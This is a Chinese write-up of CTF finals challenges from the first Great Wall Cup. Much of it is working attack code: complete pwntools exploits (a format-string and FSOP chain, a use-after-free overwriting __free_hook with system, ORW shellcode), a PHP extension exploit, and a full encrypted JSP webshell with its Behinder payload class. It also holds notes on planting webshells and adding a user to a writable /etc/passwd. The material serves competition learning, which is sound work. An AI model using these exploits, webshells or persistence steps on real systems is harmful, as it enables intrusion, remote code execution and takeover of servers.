本文主要是介绍第一届 长城杯 总决赛wp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
第一届 长城杯 总决赛 - Ahisec
第一阶段
Zip_guessinteger
第一层bkcrack攻击部分明文,注意偏移
┌──(root㉿Ten)-[~/tools/Misc/bkcrack]
└─# ./bkcrack -C zip_guessinteger.zip -c breakthroughentry.txt+flag.txt.zip -p 1.txt -o 30
bkcrack 1.6.1 - 2024-01-22
[15:38:10] Z reduction using 13 bytes of known plaintext
100.0 % (13 / 13)
[15:38:10] Attack on 516233 Z values at index 37
Keys: 003e5ac3 885a9927 00c436d9
3.2 % (16406 / 516233)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 16406
[15:38:23] Keys
003e5ac3 885a9927 00c436d9
根据着三个key直接创建一个新的压缩包和密码
./bkcrack -C zip_guessinteger.zip -k 003e5ac3 885a9927 00c436d9 -U easy.zip 123
然后解压缩分析
guessinteger
根据以上代码分析,我们要满足其值条件才会生成一个breakthroughentry.txt对另一个压缩包进行攻击
但是这题出题人出了一个小问题,直接把明文就丢出来了,根本不需要去满足啥条件,直接复制粘贴,只要注意一下\r\n就可以了
然后使用7zip进行压缩,最后直接使用Advanced Archive Password Recovery就可以攻击成功
BlindFlowanalyis
虽然有很多sql盲注,但是过滤大小的时候就可以发现有union select
在webflow1.pcap里面发现secret表,并且里面含有私钥
在webflow2.pcap里面发现flagdata表,并且里面含有密文
并且都是用户对应用户,最后的用户都是admin
私钥
密文
然后编写脚本进行解密,注意admin私钥的开头有问题,需要将MTTC替换成正常的MIIC
from Crypto.PublicKey import RSA
import libnum
import gmpy2
# with open("private.pem", "rb") as f:
# key = RSA.import_key(f.read())
# print("n = %d" % key.n)
# print("e = %d" % key.e)
# print("d = %d" % key.d)
# print("p = %d" % key.p)
# print("q = %d" % key.q)# strs = "MTTC3TBXBgkqhkiG9w0BBQ0wSjApBgkqhkiG9w0BBQwwHAQIVLQmLXnlUYkCAggAMAwGCCqGSIb3DQIJBQAwHQYJYIZIAWUDBAEqBBBCQKgOObf2BrhJ9tHvAb4oBIICgP3WaNdtO3oTAX1GjdqBL0f6HvFZ9q25EIOAah78rfhKNrJQP0uHHUnbIDKUZTSMwNZ7kNQAAnJPdjwhZVNbymCjUrVvqs0VD8GWncUlIIxrAkpsgqioABSKLoy280ubg2s1IV/sqbuuvN4ldPvnAvyrLLnNLgGyU86v2Q1ArFWfG4kgeZSpW06W6TwgeIZbjRSnLKFXx1VEhpZSCOadg/HOh8BfLbFlZiWgDiuTdVSzGq34fLV8jKYfUjhEffh/tCNhjU5E8M6ItqgXZYyjbBO2ujewBzV1JiBE0QvcavwT8JvV2IDQXBtQmBJZXH4Vqoo2n5YmUgUFDxoZSdAqOfh5kcgO0OgORhOrX/qNisaDfBMwGx2csywJBuSujzZ3ckV3Gv2ysMzRPKfyZ/v10zElsrKZHci2wDMZ4XYqNyvPDafWaxkSNXP64eYRS8J6WVgWycaPq0LkoJnuxtmOnlYlZ8cmY2zOf4WfyG7X+NhK6CllS0or2Y7fuqo80dmGTrg7cuVA1GguRMA6qZAOlbqu8zT53vGUOIHDRQFb8DUU5H6t+I3e0+0Qj8ZwgTtUMCx2/WLc0YAq18Al9okrtsxuYIQ815SSxXKOXZsX93hACLEFFkKOW7vNdBMJdVJnbPoaMotkDYtH/d8TYPrrtyOhPRa/Xl8BzA9J40Z3PE+5XaQfTC4Wx9GMb3y/Dv1lVXrAd9XvCPD8jr6tu+aQWpMAq0uLpF0kgyS/5FDfIpiEHMMuRQ+FBKS58HWVkX1yKNmXkljJRpwe53AHLuDgt+0LNhry+5ck2GFH7bkxU13WmotrtUtnSdIX7FZrQzbJmbwHiyMi7oGdKT7vxkr3aFY="
# for i in range(0,len(strs),64):
# print(strs[i:i+64])# from Crypto.PublicKey import RSA
#
# # 读取加密的私钥文件
# file_in = open("private.pem", "rb")
# encrypted_key = file_in.read()
# file_in.close()
#
# # 密码爆破函数
# def passphrase_cracker():
# # 读取密码字典文件
# with open("pass.txt", "r",encoding="utf-8") as file:
# passwords = file.readlines()
#
# # 尝试每个密码
# for password in passwords:
# passphrase = password.strip()
# try:
# key = RSA.import_key(encrypted_key, passphrase=passphrase)
# print(f"Passphrase cracked: {passphrase}")
# print("n = %d" % key.n)
# print("e = %d" % key.e)
# print("d = %d" % key.d)
# print("p = %d" % key.p)
# print("q = %d" % key.q)
# break # 如果找到正确的密码,停止循环
# except ValueError:
# continue
#
#
# # 调用密码爆破函数
# passphrase_cracker()n = 136024092362152689710172713899392826085562613819502637163574709012959800908069097569347489959246188000879909455954675900898187256462694001680199507890264369748020986792003039927832146357618380320485640247974651461597017754521523478582789651823653650205470697891883134131193787384293246455773119816555908050877
e = 65537
d = 96983349311172448114610684077344531859866705158061854017461211652174689366790434748659538326833645524163686606777761277160529104669611099325734812475218305914063705028257975357368955813173682894994622796568980398528404622799756620123598161913849740935593865664141149764560174893499019267153779766584891066853
p = 12048894621399454101058574170146672880023504304935502855438830209547540828334463319100866266089541071671086068945870668091434002554455832672446379382564831
q = 11289342021513486663717934560260253958877903230700176094000844663541917077757746704211638621740652499799934180688739478331856827700031454191788549757111267c = "MDgnetOpihRoTmbreC2P7EQqkmeHloAWQ0SA2gKuHWPUP3u8u81ewsTnlyhvc7qLMMpVl36M9Z0Hu++yIKt2C/mimOFH04ixQAUo5y8h8vajw7vRLwfhpxC+pSjWvxjP2ieWVgdmXraijq92K6vdXod/SVaOyBT/1/asqhq1abQ="import base64c = base64.b64decode(c.encode())
c = libnum.s2n(c)phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(libnum.n2s(int(m)))flag{182w3t-he5dr4y8g-gy590-gggtd46nd-dgw3456utg676}
kernel
分值:200
- 一个简单的xtea
- 写哥decrypt 直接出
#include<stdio.h>void xtea_encryt(unsigned int rb, unsigned int *buf, int *key)
{unsigned int v3; // [rsp+0h] [rbp-28h]unsigned int v4; // [rsp+4h] [rbp-24h]unsigned int v5; // [rsp+8h] [rbp-20h]unsigned int i; // [rsp+Ch] [rbp-1Ch]v4 = *buf;v5 = buf[1];v3 = 0;for ( i = 0; i < rb; ++i ){v4 += (key[v3 & 3] + v3) ^ (v5 + ((v5 >> 6) ^ (4 * v5)));v3 -= 1640951535;v5 += (key[(v3 >> 11) & 3] + v3) ^ (v4 + ((v4 >> 6) ^ (8 * v4)));}*buf = v4;buf[1] = v5;
}void xtea_decrypt(unsigned int rb, unsigned int *buf, int *key)
{unsigned int v3; // [rsp+0h] [rbp-28h]unsigned int v4; // [rsp+4h] [rbp-24h]unsigned int v5; // [rsp+8h] [rbp-20h]unsigned int i; // [rsp+Ch] [rbp-1Ch]v4 = *buf;v5 = buf[1];v3 = (0x100000000 - 1640951535) * rb;for ( i = 0; i < rb; ++i ){v5 -= (key[(v3 >> 11) & 3] + v3) ^ (v4 + ((v4 >> 6) ^ (8 * v4)));v3 += 1640951535;v4 -= (key[v3 & 3] + v3) ^ (v5 + ((v5 >> 6) ^ (4 * v5)));}*buf = v4;buf[1] = v5;
}int main(){int key[4];key[0] = 0x1234;key[1] = 0x3A4D;key[2] = 0x5E6F;key[3] = 0xAA33;unsigned int tmp[2];unsigned int flag[] = {0x8CCAF011, 0x835A03B8, 0x6DCC9BAD, 0xE671FA99, 0xE6011F35, 0xE5A56CC8, 0xD4847CFA, 0x5D8E0B8E};for(int i=0;i<8;i+=2){tmp[0] = flag[i];tmp[1] = flag[i+1];xtea_decrypt(33,tmp,key);flag[i] = tmp[0];flag[i+1] = tmp[1];}printf("%s\n",&flag[0]);
}- flag
>>> s = 'galfiLx{QSS1YzRzfM3wePOHCAkJ}m4mp'
>>>
>>> for i in range(0,len(s),4):
... print(s[i:i+4][::-1],end='')
...
flag{xLi1SSQzRzYw3MfHOPeJkACm4m}p
power_system
- 先绕过 sha256 的判断,这里有00 截断,所以只需要保证前面三个字节一样即可,然后 print输出pwd, 存在格式化字符串漏洞
- 爆破 sha256
import hashlibpwd = 'e85000'for i1 in range(1,0x100):for i2 in range(0, 0x100):for i3 in range(0, 0x100):m = b'-%p-%p-%p-%p'+ bytes([i1,i2,i3]).replace(b'\x00',b'')rel = hashlib.sha256(m).hexdigest()if rel[:6] == pwd:print(m,rel)input('>>')exit(0)
- 负向越界写 修改
_IO_2_1_stderr_ 结构体
- 后面 直接 exit 触发 stderr链子,用的 cat 模板,然后直接动态调试即可
from pwn import *
import sys
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
rl = lambda :io.recvline()
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
lss = lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):'''Start the exploit against the target.'''if args.GDB:return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)elif args.RE:return remote('202.0.5.76', 7777)elif args.AWD:# python3 exp.py AWD 1.1.1.1 PORTIP = str(sys.argv[1])PORT = int(sys.argv[2])return remote(IP,PORT)else:return process([binary] + argv, *a, **kw)binary = './pwn'
libelf = ''if (binary!=''): elf = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)gdbscript = '''
#brva 0x01DE1
#brva 0x01F96
b *_IO_wfile_seekoff
#continue
'''.format(**locals())io = start(binary)def login(pwd):ru('>> ')sl('2')ru('account : ')sl('QAQ')ru('password : ')sl(pwd)def adjust(idx,size,text):ru('>> ')sl('2')ru('power: ')sl(str(idx))ru('size: ')sl(str(size))ru('staff: ')sl(text)pwd = b'%p \x19\xe2'
pwd = b'-%p-%p-%p-\x8c\xb5\x08'
pwd = b'-%p-%p-%p-%p\xc0R\xb9'
login(pwd)
ru('-0x22-')
libc_base = int(ru('\xc0'),16) - 2016704 + 0x80
#libc_base = int(ru('\xc0'),16) - 0
lss('libc_base')
#exit(0)
lss('libc_base')
libc.address = libc_basepay = flat({0x00: 0,0x28: 0xffffffff,0x30: 1,0x70: b'/bin/sh',0x90: libc.sym['system'],0x98: libc.sym['_IO_2_1_stderr_']+0x70,0xa0: libc.sym['_IO_2_1_stderr_'],0xd8: libc.symbols['_IO_wfile_jumps'] + 0x30, # vtable # 可以控制虚表的走向0xe0: 0
}, filler=b"\x00")#gdb.attach(io,gdbscript)
adjust(-2,0,pay[8:])
ru('>> ')
sl('4')
sl(p64(0x31))itr()
Old_man_v1
分值:200
- UAF 直接秒
from pwn import *
import sys
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
rl = lambda :io.recvline()
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
lss = lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):'''Start the exploit against the target.'''if args.GDB:return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)elif args.RE:return remote('202.0.5.76',9999)elif args.AWD:# python3 exp.py AWD 1.1.1.1 PORTIP = str(sys.argv[1])PORT = int(sys.argv[2])return remote(IP,PORT)else:return process([binary] + argv, *a, **kw)binary = './Old_man_v1'
libelf = ''if (binary!=''): elf = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)gdbscript = '''#continue
'''.format(**locals())io = start(binary)def add(idx,size,text='A'):ru(' needed\n')sl('1')ru('add?\n')sl(str(idx))ru('include?:\n')sl(str(size))ru('about:\n')s(text)def edit(idx,text):ru(' needed\n')sl('3')ru('edit?\n')sl(str(idx))ru('about:\n')s(text)
def show(idx):ru(' needed\n')sl('2')ru('show?\n')sl(str(idx))
def rm(idx):ru(' needed\n')sl('4')ru('delete?\n')sl(str(idx))add(0,0x500)
add(1,0x68)
add(2,0x68)rm(0)
show(0)
libc_base = u64(r(8)) - 4111520
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']rm(1)
rm(2)edit(2,p64(free_hook))add(3,0x68,'/bin/sh\x00')
add(4,0x68,p64(system))
lss('libc_base')rm(3)
#gdb.attach(io,gdbscript)itr()
SandBoxShell
- 简单的 ORW flag ,也是直接秒
from pwn import *
import sys
s = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(str(delim), data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(str(delim), data)
r = lambda num :io.recv(num)
ru = lambda delims, drop=True :io.recvuntil(delims, drop)
rl = lambda :io.recvline()
itr = lambda :io.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
ls = lambda data :log.success(data)
lss = lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h','-l','130']
def start(binary,argv=[], *a, **kw):'''Start the exploit against the target.'''if args.GDB:return gdb.debug([binary] + argv, gdbscript=gdbscript, *a, **kw)elif args.RE:return remote('202.0.5.76',8888)elif args.AWD:# python3 exp.py AWD 1.1.1.1 PORTIP = str(sys.argv[1])PORT = int(sys.argv[2])return remote(IP,PORT)else:return process([binary] + argv, *a, **kw)binary = './SandBoxShell'
libelf = ''if (binary!=''): elf = ELF(binary) ; rop=ROP(binary);libc = elf.libc
if (libelf!=''): libc = ELF(libelf)gdbscript = '''#continue
'''.format(**locals())io = start(binary)pay = asm(shellcraft.cat('/flag'))
sl(pay)
#gdb.attach(io,gdbscript)itr()
numberGame
-
之前D3CTF 的php pwn题研究过,所以可以搞一搞
-
调试方式,把 ubuntu 22的 gdbserver 上传到 docker 里面
./gdbserver :1234 php -S 0:8080
- 然后就是调试了
- 贴个exp
<?php$heap_base = 0;
$libc_base = 0;
$libc = "";
$mbase = "";function u64($leak){$leak = strrev($leak);$leak = bin2hex($leak);$leak = hexdec($leak);return $leak;
}function p64($addr){$addr = dechex($addr);$addr = hex2bin($addr);$addr = strrev($addr);$addr = str_pad($addr, 8, "\x00");return $addr;
}function leakaddr($buffer){global $libc, $mbase;$p = '/([0-9a-f]+)\-[0-9a-f]+ .* \/usr\/lib\/x86_64-linux-gnu\/libc.so.6/';$p1 = '/([0-9a-f]+)\-[0-9a-f]+ .* \/usr\/local\/lib\/php\/extensions\/no-debug-non-zts-20230831\/numberGame.so/';preg_match_all($p, $buffer, $libc);preg_match_all($p1, $buffer, $mbase);return "";
}ob_start("leakaddr");
include("/proc/self/maps");
$buffer = ob_get_contents();
ob_end_flush();
leakaddr($buffer);echo "\n----1-----\n";
add_chunk(5,[0,0,0,0x80000000,0],"test1"); #需要构造好
#add_chunk(1,[0],"/bin/sh;");
add_chunk(1,[0],"/bin/sh");
$rel = show_chunk(0); # vlun 会把数组控制的范围增大,然后 越界修改和泄露其他地方的值$heap = $rel[7];
$heap += ($rel[8] << 0x20);$of = $heap - 72; # 数组起始
#
$str_got = hexdec($mbase[1][0])+ 0x4008;
##
echo "\n----heap-----\n";
echo dechex($heap);
echo "\n----4-----\n";
echo $libc[1][0];
echo "\n----4-----\n";
#
$offset = ($str_got - $of) / 4;$system = (hexdec($libc[1][0]) + 0x4c490);echo $offset;
edit_chunk(0,$offset,$system & 0xffffffff); # 修改strlen_got表低四字节为 systemedit_name(1,'1'); # ?>
flag{9ce574baaa9669609898af3dce30912e}
aesweblog
根据提供脚本发现flag是倒序存放的
而且flag是经过aes加密的,且密钥存放在secrets表中
flag 密文存放在user_flag表中
请求日志 url解码
这里开始判断secrets中获取datetime如果为null则返回空,而且这里使用的是二分法判断的
发现secrets表共有24条数据
customers表也是共24条数据
还判断了user_flag表,其中flagvalue字段共24条
共有6个flag,但是这里只要flag1+flag6两个,且flag是以倒叙存放在secrets表(密钥)和user_flag表(密文)
所以我们需要获取secrets表的倒数第一行(SELECT COALESCE(passphrase,CHAR(32)) FROM secrets LIMIT 23,1)
和倒数第6行(SELECT COALESCE(passphrase,CHAR(32)) FROM secrets LIMIT 18,1)
还要获取user_flag表的倒数第一行(SELECT COALESCE(flagvalue,CHAR(32)) FROM user_flag LIMIT 23,1)
和倒数第6行(SELECT COALESCE(flagvalue,CHAR(32)) FROM user_flag LIMIT 18,1)
提取值脚本
import pprint
import re
data = {}
with open("./2.txt","r") as f:for i in f.readlines():try:res = i.split(" ")[15:16][0]res2 = res.strip().split(">")prex = res2[0]hz = res2[1]data[prex] = hzdata.update(data)except:pass# pprint.pprint(data)for v in data.values():num = int(re.findall(r"\((.*?)\)",v)[0])print(chr(num),end='')# print(num,"=",chr(num))# dict1 = {'a': 1, 'b': 2}
# dict2 = {'b': 3, 'c': 4}
#
# dict1.update(dict2)
# print(dict1) # 输出: {'a': 1, 'b': 3, 'c': 4}
解密脚本
import sys
import base64
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad,unpad
import hashlibdef derive_key(passphrase, salt, iterations, key_length):h = hashlib.sha256()u = passphrase.encode("utf-8") + saltfor _ in range(iterations):h.update(u)u = h.digest()return h.digest()[:key_length]def decrypt_data(passphrase, encrypted_data_b64):iterations = 10000key_length = 16salt = hashlib.md5(passphrase.encode("utf-8") + b"saltseed").digest()iv = hashlib.md5(passphrase.encode("utf-8") + b"IVseed").digest()key = derive_key(passphrase, salt, iterations, key_length)decipher = AES.new(key, AES.MODE_CBC, iv)encrypted_data = base64.b64decode(encrypted_data_b64)decrypted_padded_data = decipher.decrypt(encrypted_data)decrypted_data = unpad(decrypted_padded_data, AES.block_size)return decrypted_dataif __name__ == "__main__":if len(sys.argv) != 3:print("Usage: python script.py <passphrase> <encrypted_flagdata_b64>")sys.exit(1)passphrase = sys.argv[1]encrypted_flagdata_b64 = sys.argv[2]decrypted_data = decrypt_data(passphrase, encrypted_flagdata_b64)print(decrypted_data)
"""
7xjo0DHFsoF1Jrus
TJOC6+L+vTajLOGqfJMweoLFZqvJlTr01ZNX8R9xotVanrPtKiBjCfQD5U5dD+KLRPgjnQ4=
PgH8ySWqsB1IJEradvOouNWEP5mpHZnu5e9ShkiS1LWLb81hRUjAZLD4zzzxO5Tnflag1{e6f1573b9496a7f3}
flag6{a85bcfc646ff161c71e520e7cba3}flag{e6f1573b9496a7f3-a85bcfc646ff161c71e520e7cba3}"""
第二阶段
关卡01:
关卡描述:黑客攻击此服务器所使用的2个IP分别是什么(ascii码从小到大排列,空格分隔)
关卡02:
50 分 关卡描述:存在安全问题的apk中使用的登录密码是什么?
关卡03:
50 分 关卡描述:黑客尝试上传一个文件但显示无上传权限的文件名是什么?
pic.jpg
关卡04:
150 分 关卡描述:黑客利用的漏洞接口的api地址是什么?(http://xxxx/xx)
http://202.1.1.66:8080/api/upload
关卡05:
150 分 关卡描述:黑客上传的webshell绝对路径是什么?
/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp
关卡06:
150 分 关卡描述:黑客上传的webshell的密码是什么?
`<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>`
bing_pass
关卡07
关卡描述:黑客通过webshell执行的第一条命令是什么?
http contains “s74e7vwmzs21d5x6.jsp”
package net.rebeyond.behinder.payload.java;import java.io.File;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Properties;
import java.util.Set;
import java.util.Map.Entry;
import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletOutputStream;
import javax.servlet.jsp.PageContext;public class BasicInfo {public boolean equals(Object obj) {PageContext page = (PageContext)obj;page.getResponse().setCharacterEncoding("UTF-8");String result = "";try {StringBuilder e = new StringBuilder("<br/><font size=2 color=red>鐜鍙橀噺:</font><br/>");Map env = System.getenv();Iterator entrySet = env.keySet().iterator();while(entrySet.hasNext()) {String props = (String)entrySet.next();e.append(props + "=" + (String)env.get(props) + "<br/>");}e.append("<br/><font size=2 color=red>JRE绯荤粺灞炴��:</font><br/>");Properties var16 = System.getProperties();Set var17 = var16.entrySet();Iterator driveList = var17.iterator();while(driveList.hasNext()) {Entry currentPath = (Entry)driveList.next();e.append(currentPath.getKey() + " = " + currentPath.getValue() + "<br/>");}String var18 = (new File("")).getAbsolutePath();String var19 = "";File[] roots = File.listRoots();File[] so = roots;int key = roots.length;for(int entity = 0; entity < key; ++entity) {File osInfo = so[entity];var19 = var19 + osInfo.getPath() + ";";}String var20 = System.getProperty("os.name") + System.getProperty("os.version") + System.getProperty("os.arch");HashMap var21 = new HashMap();var21.put("basicInfo", e.toString());var21.put("currentPath", var18);var21.put("driveList", var19);var21.put("osInfo", var20);result = this.buildJson(var21, true);String var22 = page.getSession().getAttribute("u").toString();ServletOutputStream var23 = page.getResponse().getOutputStream();var23.write(Encrypt(result.getBytes(), var22));var23.flush();var23.close();page.getOut().clear();} catch (Exception var15) {var15.printStackTrace();}return true;}public static byte[] Encrypt(byte[] bs, String key) throws Exception {byte[] raw = key.getBytes("utf-8");SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");cipher.init(1, skeySpec);byte[] encrypted = cipher.doFinal(bs);return encrypted;}private String buildJson(Map entity, boolean encode) throws Exception {StringBuilder sb = new StringBuilder();String version = System.getProperty("java.version");sb.append("{");Iterator var6 = entity.keySet().iterator();while(var6.hasNext()) {String key = (String)var6.next();sb.append("\"" + key + "\":\"");String value = ((String)entity.get(key)).toString();if(encode) {Class Base64;Object Encoder;if(version.compareTo("1.9") >= 0) {this.getClass();Base64 = Class.forName("java.util.Base64");Encoder = Base64.getMethod("getEncoder", (Class[])null).invoke(Base64, (Object[])null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{value.getBytes("UTF-8")});} else {this.getClass();Base64 = Class.forName("sun.misc.BASE64Encoder");Encoder = Base64.newInstance();value = (String)Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{value.getBytes("UTF-8")});value = value.replace("\n", "").replace("\r", "");}}sb.append(value);sb.append("\",");}sb.setLength(sb.length() - 1);sb.append("}");return sb.toString();}
}pwd
关卡08
黑客获取webshell时查询当前shell的权限是什么?
tomcat
关卡09
关卡描述:利用webshell查询服务器Linux系统发行版本是什么?
关卡10
关卡描述:黑客从服务器上下载的秘密文件的绝对路径是什么?
关卡11:
50 分 关卡描述:黑客通过反连执行的第一条命令是什么?
关卡12:
50 分 关卡描述:黑客通过什么文件修改的root密码(绝对路径)
关卡13:
250 分 关卡描述:黑客设置的root密码是多少?
关卡14:
50 分 关卡描述:黑客留下后门的反连的ip和port是什么?(ip:port)
关卡15:
150 分 关卡描述:黑客通过后门反连执行的第一条命令是什么?
第三阶段
202.0.6.233
flag1
flag2
flag3
flag3{21db4fb5e7cd1d14f041436c4f50ce8c}
flag4
http://202.0.6.233/uploads/shell.php
flag5
flag6
flag1{9a0fe27c8bcc9aad51eda55e1b735eb5}
flag2{5399019c4053e1a5e756522fe94cdefe}
flag3{21db4fb5e7cd1d14f041436c4f50ce8c}
flag4{efba34b4991857a0c3639a0a31424041}
flag5{a40310f194e1abfec9581d026e29832c}
flag6{bf2bbf3cf5bf7fa02fcfd1f649a03a78}
202.0.6.236
flag8
http://202.0.6.236/server/php/files/xiaomao.php 密码 1
flag9
/etc/passwd 可读可写的
- 写个用户和密码进去
172.25.0.100
[root@jquery sss]# ./fscan -h 172.25.0.100/24___ _/ _ \ ___ ___ _ __ __ _ ___| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\fscan version: 1.8.3
start infoscan
(icmp) Target 172.25.0.7 is alive
(icmp) Target 172.25.0.2 is alive
(icmp) Target 172.25.0.100 is alive
(icmp) Target 172.25.0.254 is alive
[*] Icmp alive hosts len is: 4
172.25.0.100:8080 open
172.25.0.100:445 open
172.25.0.100:139 open
172.25.0.100:80 open
172.25.0.2:80 open
172.25.0.7:80 open
172.25.0.100:22 open
172.25.0.2:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.25.0.100 code:200 len:750 title:Index of /
[*] WebTitle http://172.25.0.2 code:200 len:747 title:None
[*] NetBios 172.25.0.100 STORAGE\STORAGE Windows 6.1
[*] OsInfo 172.25.0.100 (Windows 6.1)
[*] WebTitle http://172.25.0.100:8080 code:200 len:256 title:None
[*] WebTitle http://172.25.0.7 code:200 len:93114 title:一个好网站
flag12
flag14
这篇关于第一届 长城杯 总决赛wp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
